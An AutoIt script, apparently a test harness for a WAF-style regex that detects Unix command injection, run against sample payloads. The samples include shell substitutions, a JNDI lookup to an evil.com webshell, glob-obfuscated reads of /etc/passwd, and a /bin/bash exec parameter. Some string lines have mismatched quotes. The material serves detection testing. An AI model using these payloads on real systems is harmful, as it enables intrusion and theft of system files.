#include <StringConstants.au3> ; to declare the Constants of StringRegExp
#include <Array.au3> ; UDF needed for _ArrayDisplay and _ArrayConcatenate
Local $sRegex = "(?m)\$(?:\((?:[^\(\)]*|\([^\(\)]*\))\)|\{[^\{\}]*\}|\[[^\[\]]*\])|[<>]\([^\(\)]*\)|(?:/[0-9A-Z_a-z]*\[!?[^/\]]+|\[[0-9A-Z_a-z]/+)\]"
Local $sString = "/get?932130-1=$(cmd)" & @CRLF & _
"932130-2=${cmd}" & @CRLF & _
"931120-3=<(cmd)" & @CRLF & _
">(cmd)=931120-4" & @CRLF & _
"{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}" & @CRLF & _
"var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" & @CRLF & _
"cat /etc/pa[s]swd" & @CRLF & _
"cat /[?]tc/pa[?]swd" & @CRLF & _
"/get?s=/etc/pas[s]wd"" & @CRLF & _
"/get?s=/etc/[!q]asswd" & @CRLF & _
"/get?s=/etc/[m-z]asswd" & @CRLF & _
"/get?s=/usr/bin/[u]name+-a" & @CRLF & _
"/get?exec=/bi[n]/bash" & @CRLF & _
"/get?932130-17=$([])" & @CRLF & _
"echo $(echo $(cat /etc/passwd))" & @CRLF & _
"echo ${asd} " & @CRLF & _
"cat /etc/[p//]asswd" & @CRLF & _
"cat /[e//]tc/[p//]asswd" & @CRLF & _
"cat /[e/////////]tc/[p//]asswd" & @CRLF & _
"ls a[b///]c" & @CRLF & _
"ls *[a//]c" & @CRLF & _
"# should not match" & @CRLF & _
"932130-5=Some text (in brackets)." & @CRLF & _
"hello [text in brackets]" & @CRLF & _
"take this math expression: 1/[a/-1]" & @CRLF & _
"plase calculate the following a/[b/1234*c]" & @CRLF & _
"" & @CRLF & _
""
Local $aArray = StringRegExp($sString, $sRegex, $STR_REGEXPARRAYGLOBALFULLMATCH)
Local $aFullArray[0]
For $i = 0 To UBound($aArray) -1
_ArrayConcatenate($aFullArray, $aArray[$i])
Next
$aArray = $aFullArray
; Present the entire match result
_ArrayDisplay($aArray, "Result")